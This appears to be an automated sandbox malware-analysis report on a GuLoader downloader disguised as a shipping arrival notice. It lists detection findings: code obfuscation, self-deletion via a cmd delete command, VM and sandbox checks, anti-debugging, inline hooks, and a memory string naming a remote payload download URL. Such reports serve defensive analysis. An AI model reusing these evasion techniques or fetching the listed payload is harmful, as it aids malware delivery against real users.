Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9B00 NtSetValueKey, 14_2_048A9B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AA710 NtOpenProcessToken, 14_2_048AA710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9730 NtQueryVirtualMemory, 14_2_048A9730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9760 NtOpenProcess, 14_2_048A9760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048A9770 NtSetInformationFile, 14_2_048A9770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048AA770 NtOpenThread, 14_2_048AA770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819D50 NtCreateFile, 14_2_00819D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819E80 NtClose, 14_2_00819E80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819E00 NtReadFile, 14_2_00819E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819F30 NtAllocateVirtualMemory, 14_2_00819F30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819DFA NtReadFile, 14_2_00819DFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819D4A NtCreateFile, 14_2_00819D4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00819F2A NtAllocateVirtualMemory, 14_2_00819F2A
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929592552.0000000002A30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesmedesvende.exeFE2XKareo vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000000.661545013.0000000000448000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258380873.00000000000D9000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000000.927484403.0000000000448000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Binary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
PE file contains strange resources
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Virustotal: Detection: 25%
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe ReversingLabs: Detection: 18%
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@10/8
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.929197382.0000000000780000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_004064C4 push ebp; iretd 0_2_004064C6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0040A8F6 push esi; ret 0_2_0040A97B
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00403171 push ds; ret 0_2_00403172
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00404979 push esi; ret 0_2_00404980
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00407B84 push es; ret 0_2_00407B85
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790749 push FFFFFF85h; retf 0_2_00790753
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078089F push 2FA9C30Eh; ret 0_2_007808F5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007899BC push FFFFFF85h; retf 0805h 0_2_007899EB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E65D0D1 push ecx; ret 12_2_1E65D0E4
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_00574CB6 push ds; iretd 12_2_00574CB7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_048BD0D1 push ecx; ret 14_2_048BD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00817057 push ebx; retf 14_2_0081705E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081B059 push edx; ret 14_2_0081B05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0080E3F4 push edi; ret 14_2_0080E408
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0080E325 push edx; retf 14_2_0080E326
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00816B58 push ebp; retf 14_2_00816B5A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081E490 push cs; ret 14_2_0081E492
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00804556 push edi; retf 14_2_00804559
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CEA5 push eax; ret 14_2_0081CEF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CEF2 push eax; ret 14_2_0081CEF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CEFB push eax; ret 14_2_0081CF62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00817622 push FFFFFFC4h; iretd 14_2_00817632
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00817636 push ds; ret 14_2_00817637
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0081CF5C push eax; ret 14_2_0081CF62
PE file contains an invalid checksum
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: real checksum: 0x791f7 should be: 0x73bc1

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE2
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://WWW.PAULASSINKARCHITECT.NL/BIN_FDIYU115.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000008098E4 second address: 00000000008098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000809B4E second address: 0000000000809B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5076 Thread sleep count: 88 > 30
Source: C:\Windows\explorer.exe TID: 5076 Thread sleep time: -176000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790523 rdtsc 0_2_00790523
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe System information queried: ModuleInformation
Source: explorer.exe, 0000000D.00000000.1242795289.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: explorer.exe, 0000000D.00000000.1196380062.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWxL
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258621703.00000000009A6000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000D.00000000.1213774669.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929465045.00000000021E0000.00000004.00000001.sdmp, NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 0000000D.00000000.1243122844.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Thread information set: HideFromDebugger
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00790523 rdtsc 0_2_00790523
Enables debug privileges
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875D7 mov eax, dword ptr fs:[00000030h] 0_2_007875D7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078752F mov eax, dword ptr fs:[00000030h] 0_2_0078752F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007875F9 mov eax, dword ptr fs:[00000030h] 0_2_007875F9
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_007918D3 mov eax, dword ptr fs:[00000030h] 0_2_007918D3
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00791915 mov eax, dword ptr fs:[00000030h] 0_2_00791915
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FCF5 mov eax, dword ptr fs:[00000030h] 0_2_0078FCF5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078FCB7 mov eax, dword ptr fs:[00000030h] 0_2_0078FCB7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078AD21 mov eax, dword ptr fs:[00000030h] 0_2_0078AD21
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_00785EAC mov eax, dword ptr fs:[00000030h] 0_2_00785EAC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 0_2_0078EF53 mov eax, dword ptr fs:[00000030h] 0_2_0078EF53
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h] 12_2_1E6BB260
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BB260 mov eax, dword ptr fs:[00000030h] 12_2_1E6BB260
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61766D mov eax, dword ptr fs:[00000030h] 12_2_1E61766D
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8A62 mov eax, dword ptr fs:[00000030h] 12_2_1E6D8A62
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E62AE73 mov eax, dword ptr fs:[00000030h] 12_2_1E62AE73
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E64927A mov eax, dword ptr fs:[00000030h] 12_2_1E64927A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E609240 mov eax, dword ptr fs:[00000030h] 12_2_1E609240
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E617E41 mov eax, dword ptr fs:[00000030h] 12_2_1E617E41
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E694257 mov eax, dword ptr fs:[00000030h] 12_2_1E694257
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60E620 mov eax, dword ptr fs:[00000030h] 12_2_1E60E620
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BFE3F mov eax, dword ptr fs:[00000030h] 12_2_1E6BFE3F
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h] 12_2_1E60C600
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h] 12_2_1E60C600
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60C600 mov eax, dword ptr fs:[00000030h] 12_2_1E60C600
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E638E00 mov eax, dword ptr fs:[00000030h] 12_2_1E638E00
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E618A0A mov eax, dword ptr fs:[00000030h] 12_2_1E618A0A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E623A1C mov eax, dword ptr fs:[00000030h] 12_2_1E623A1C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h] 12_2_1E63A61C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63A61C mov eax, dword ptr fs:[00000030h] 12_2_1E63A61C
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6316E0 mov ecx, dword ptr fs:[00000030h] 12_2_1E6316E0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6176E2 mov eax, dword ptr fs:[00000030h] 12_2_1E6176E2
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E648EC7 mov eax, dword ptr fs:[00000030h] 12_2_1E648EC7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6BFEC0 mov eax, dword ptr fs:[00000030h] 12_2_1E6BFEC0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6336CC mov eax, dword ptr fs:[00000030h] 12_2_1E6336CC
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8ED6 mov eax, dword ptr fs:[00000030h] 12_2_1E6D8ED6
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6052A5 mov eax, dword ptr fs:[00000030h] 12_2_1E6052A5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h] 12_2_1E6D0EA5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h] 12_2_1E6D0EA5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D0EA5 mov eax, dword ptr fs:[00000030h] 12_2_1E6D0EA5
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6846A7 mov eax, dword ptr fs:[00000030h] 12_2_1E6846A7
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h] 12_2_1E61AAB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61AAB0 mov eax, dword ptr fs:[00000030h] 12_2_1E61AAB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63FAB0 mov eax, dword ptr fs:[00000030h] 12_2_1E63FAB0
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E69FE87 mov eax, dword ptr fs:[00000030h] 12_2_1E69FE87
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h] 12_2_1E63D294
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E63D294 mov eax, dword ptr fs:[00000030h] 12_2_1E63D294
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E60DB60 mov ecx, dword ptr fs:[00000030h] 12_2_1E60DB60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E61FF60 mov eax, dword ptr fs:[00000030h] 12_2_1E61FF60
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E6D8F6A mov eax, dword ptr fs:[00000030h] 12_2_1E6D8F6A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E633B7A mov eax, dword ptr fs:[00000030h] 12_2_1E633B7A
Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Code function: 12_2_1E633B7A mov eax, dword ptr fs:[00000030h] 12_2_1E633B7A
